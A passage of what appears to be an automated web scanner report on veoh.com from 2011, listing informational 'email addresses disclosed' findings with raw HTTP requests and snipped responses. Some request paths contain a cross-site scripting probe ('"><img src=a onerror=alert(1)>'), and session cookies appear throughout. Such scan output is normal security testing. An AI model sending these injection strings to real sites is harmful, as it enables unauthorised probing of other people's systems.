Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 57369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.28. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99
Content-Length: 76451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.29. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:21 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 76599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.30. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 132878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.31. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 140850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.32. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=30
Content-Length: 142204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.33. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/entertainment/watch/v20767324YkGXZzfQ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 134408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.34. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

Issue detail

The following email addresses were disclosed in the response:

Request

GET /browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=73
Content-Length: 147258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a class="contactSupport" href="mailto:u3@veoh.com?subject=[error] Veoh Web Player&body=[localconnection] Localconnection failed.">
...[SNIP]...
<a id="contactSupport_notavailable" href="mailto:u3@veoh.com?subject=[localhost] Veoh Web Player &body=Localhost failed to open port ">
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.35. http://www.veoh.com/browse/webseries  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/webseries HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:44:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.36. http://www.veoh.com/browse/webseries/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/webseries/ HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:19 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=65
Content-Length: 75167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.37. http://www.veoh.com/browse/webseries/featured/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/webseries/featured/1

Issue detail

The following email address was disclosed in the response:

Request

GET /browse/webseries/featured/1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.38. http://www.veoh.com/bulletin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /bulletin

Issue detail

The following email address was disclosed in the response:

Request

GET /bulletin HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 27466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.39. http://www.veoh.com/collection/Veoh-Editor-Picks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /collection/Veoh-Editor-Picks

Issue detail

The following email address was disclosed in the response:

Request

GET /collection/Veoh-Editor-Picks HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 105468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<a id="footer-advertise" href="mailto:advertising@veoh.com" title="Advertise">
...[SNIP]...

9.40. http://www.veoh.com/corporate/aboutus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/aboutus

Issue detail

The following email address was disclosed in the response:

Request

GET /corporate/aboutus HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
